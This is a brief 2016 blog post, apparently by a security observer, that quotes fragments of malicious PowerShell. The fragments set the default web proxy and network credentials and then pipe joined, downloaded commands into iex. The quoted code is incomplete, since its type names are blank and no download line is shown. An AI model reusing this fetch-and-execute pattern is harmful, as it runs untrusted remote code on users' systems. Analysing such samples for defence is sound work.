Wednesday, August 31, 2016

Malicious Powershell executing downloaded scripts

Interesting Powershell commands. Appears to download a list of Powershell commands, join them together, and execute them.

$web.proxy = []::defaultwebproxy;
$web.proxy.credentials = []::defaultnetworkcredentials;
iex ($x-join)

